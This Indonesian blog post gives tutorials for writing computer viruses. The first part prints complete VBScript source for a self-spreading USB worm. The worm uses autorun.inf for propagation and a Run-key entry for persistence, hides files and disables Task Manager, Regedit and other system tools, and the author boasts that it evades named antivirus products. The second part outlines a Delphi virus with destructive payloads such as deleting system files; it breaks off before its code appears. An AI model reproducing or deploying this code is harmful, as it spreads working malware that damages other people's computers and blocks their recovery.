selamat datang para pengunjung setia kami

duit gratis

Senin, 15 Desember 2008

Membuat Virus Memakai notepad

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Membuat Virus Memakai Delphi

Pendahuluan Virus terdiri dari lima huruf yang cukup membuat orang sensitif dan berfikiran negatif bila mendengarnya. Dahulu, virus didominasi di bidang kedokteran, banyak para dokter ahli berusaha untuk membuat anti virus dari suatu penyakit. Penelitian para dokter ahli tentang virus pun tidak ada batasannya karena masih ada beberapa jenis virus yang belum ada serumnya seperti virus HIV, belum lagi virus yang tidak teridentifikasi dan diperparah oleh beberapa “pakar” yang berusaha mati-matian membuat virus (senjata pemusnah massal ?). Sekarang ini virus tidak lagi didominasi di bidang kedokteran, virus juga sudah berani unjuk gigi di bidang komputer. Virus yang ada di komputer berbeda dengan virus penyakit, tetapi kenapa nama mereka identik? Ini dikarenakan mereka (si virus tadi) mempunyai kemampuan untuk membuat orang emosi, was-was, gelisah, takut, pusing, stress dan segala jenis aura negatif lainnya (hebatkan…). Oleh karena kemampuan tersebutlah si virus jadi momok masyarakat. Tapi tidak semua orang membenci virus komputer. Ada beberapa orang yang cinta mati dengan virus, virus bagi mereka adalah sebuah masterpiece dari kemampuan yang dimilikinya. Mereka membuat virus untuk mewujudkan suatu keinginan. Apakah keinginan mereka sama dengan sifat dasar virus di atas? Hanya mereka yang tahu. Perancangan Viruz Perancangan akan dibuat dalam bentuk flowchart sehingga lebih mudah dipahami dan dapat membantu memperjelas pembahasan. Berikut gambar flowchart Viruz : Berikut ini penjelasan dari flowchart di atas : 1. Simbol MULAI akan memulai eksekusi dari program 2. Simbol BUAT & TANAM “KLONING VIRUS” merupakan sebuah proses yang akan membuat duplikat virus menjadi virus baru dengan nama yang berbeda. Setelah virus baru terbentuk, virus tersebut di “tanam” atau disisipkan ke dalam suatu direktori windows dengan menggunakan teknik “social engineering”, istilah gampangnya tanamkan virus hasil kloning tadi ke dalam direktori yang jarang dibuka misal direktori “C/Documents and Settings/All Users/” atau direktori yang berisi beragam aplikasi misal direktori “C:/WINDOWS/system32/” atau direktori-direktori lainnya. Setelah virus itu tertanam, buat perintah untuk menjalankan virus kloning tadi pada saat sistem operasi dibuka atau istilah kerennya buat startup untuk virus kloning sehingga virus kloning akan dijalankan secara otomatis pada saat sistem operasi dibuka. 3. Simbol MODIFIKASI & KONFIGURASI SISTEM merupakan sebuah proses yang akan mengubah konfigurasi sistem sehingga beberapa aplikasi sistem akan lumpuh atau dikunci seperti program task-manager, regedit, cmd, command, ms-config dan lainnya. 4. Simbol OPERASI “ATTACK & DEFENSE” merupakan sebuah proses berulang yang akan mengoperasikan serangkain serangan seperti membuat pesan moral, mengganti file-file dokumen menjadi kloning virus, menyembunyikan file, menggandakan folder sehingga akan membuat “garbages folder”, me-restart ulang komputer, membuat komputer hang setiap 1 menit, memutuskan koneksi internet, menghapus file-file sistem atau yang lebih parah melumpuhkan sistem selamanya yang hanya bisa diobati dengan instal ulang serta masih banyak lagi ide-ide vandalisme lain yang bisa membuat orang naik darah. Bersamaan dengan serangan, virus juga mampu untuk bertahan terhadap program yang mencoba untuk melumpuhkannya seperti program-program antivirus dan program-program lainnya. 5. Simbol STOP menandakan bahwa komputer dimatikan, jika simbol ini dijalankan tapi komputer masih dalam keadaan hidup berarti virus anda telah dilumpuhkan. Bagian berikutnya akan menjelaskan tahap-tahap implementasi flowchart di atas menjadi program menggunakan Borland Delphi 7.0. secara berurut. Tahap 1 : Membuat Project Baru Tahap pertama adalah membuat project baru. Bagi yang sudah mahir silakan lewatkan tahap ini. Tahap ini dibuat untuk para pemula di dunia delphi atau pemrograman dan orang yang curious atau addicted dengan virus atau bisa juga orang yang benci setengah mati sama virus. Sebelum membuat project anda harus membuka delphi terlebih dahulu, APPLICATION. Secara otomatis form NEW setelah delphi terbuka pilih menu FILE SAVE ALL, cari lokasi direktori untukakan muncul. Kemudian pilih menu FILE menyimpan kerja anda setelah itu ganti “Unit1” dengan “Umain” tekan tombol SAVE, kemudian ganti “Project1” dengan “Viruz” tekan tombol SAVE lagi. Tahap 2 : Menambahkan Komponen TIMER ke Dalam FORM Tambahkan komponen TIMER yang ada di tab SYSTEM ke dalam FORM yaitu dengan cara meng-klik komponen TIMER setelah itu klik ke FORM. Berikut ini gambar komponen TIMER Tahap 3 : Mengubah Properti FORM dan TIMER Pada tahap ini kita akan mengubah properti FORM dan TIMER. Properti komponen terletak di kotak “Objeck Inspector” yang terletak di pojok kiri bawah. Berikut ini gambarnya: Berikut ini beberapa properti FORM yang harus di ubah : 1. Properti CAPTION yang berisi nilai “Form1” dikosongkan 2. Properti WIDTH diisi dengan nilai 123 3. Properti HEIGHT diisi dengan nilai 34 4. Properti WINDOWSTATE diisi dengan nilai wsMinimized Setelah ketiga properti di atas di ubah maka FORM akan kelihatan seperti ini : Selanjutnya kita akan mengubah properti TIMER. Perubahan properti FORM menyebabkan komponen TIMER tersembunyi. Untuk melihat properti TIMER klik tulusan “Timer1” yang ada di kotak “Object TreeView” yang terletak di pojok kiri atas, Timer1 merupakan nama untuk komponen TIMER sedangkan Form1 adalah nama untuk komponen FORM. Berikut ini gambar kotaknya : Berikut ini beberapa properti TIMER yang harus di ubah : 1. Properti ENABLED diisi dengan TRUE 2. Properti INTERVAL diisi dengan 1


Di Indonesia sendiri sekarang sudah banyak bermunculan virus komputer, ada yang sifatnya
iseng, ada yang berisi pesan moral, ada yang dijadikan pelampiasan cinta, pokoknya sekarang
sudah banyak orang yang bisa membuat virus. Virus-virus anak negeri biasa disebut dengan
Virus Lokal. Walaupun mereka lahir dari orang lokal tapi sudah banyak orang yang emosi,
frustrasi dan hampir mati gara-gara kelakuan si virus lokal. Virus lokal yang berjalan di sistem
operasi windows kebanyakan menggunakan teknik “modifikasi konfigurasi sistem” yang
terletak di registry windows, serta beberapa “pemanggilan fungsi-fungsi sistem” yang
digunakan untuk membuat semacam “attack with defense operation” atau “defense with attack
operation” terhadap suatu program. Tujuan artikel ini bukan untuk menjadikan anda sebagai
penjahat, tapi untuk menerapkan metode pak polisi dalam menangkap penjahat “untuk
menangkap maling, harus tahu cara kerja maling”.
Artikel ini akan membahas cara pembuatan virus sederhana menggunakan program delphi.
Kode yang ditulis tidak panjang dan mudah dimengerti sehingga para pemula delphi dapat
langsung belajar membuat program yang mudah dan menarik serta bisa memodifikasi program
dengan “keinginan” sendiri. Penulis menggunakan delphi 7.0, tapi kode program ini tetap bisa
digunakan untuk delphi yang ada di bawah versi 7.0. Pembahasan akan dimulai dari
perancangan sampai dengan pembuatan kode-kode program. Nama program yang akan kita buat
ini diberi nama VIRUZ bukan virus. Selamat menikmati dan berdo’a supaya ilmu ini tidak
diniatkan untuk hal-hal yang jahat, semoga tidak.
Tahap 4 : Membuat Kode Program
Kode program dibuat di events komponen yang terletak di kotak “Objek Inspector”. Berikut ini
gambar events komponen :
Klik komponen FORM yang ada di “Object TreeView” kemudian klik “Events” yang ada di
“Objek Inspector”, cari event “OnShow” kemudian double klik kotak kosong disampingnya
seperti tampak pada gambar di bawah ini :

Setelah kotak disamping event “OnShow” di double klik maka editor delphi akan langsung
membuat prosedur untuk event OnShow. Tugas kita hanyalah mengisi kode yang diapit oleh
keyword BEGIN dan END. Kode yang kita ketikan di event OnShow akan dijalankan pada saat
form muncul. Berikut ini gambar penulisan kodenya :

Selanjutnya cari event “OnPaint” kemudian double klik disebelah kanannya, sama seperti pada
event “OnShow” maka editor delphi akan langsung membuat prosedur untuk event OnPain.
Ketikan kode diantara BEGIN dan END seperti tampak pada gambar berikut ini :

Kode event untuk FORM sudah selesai sekarang tinggal membuat kode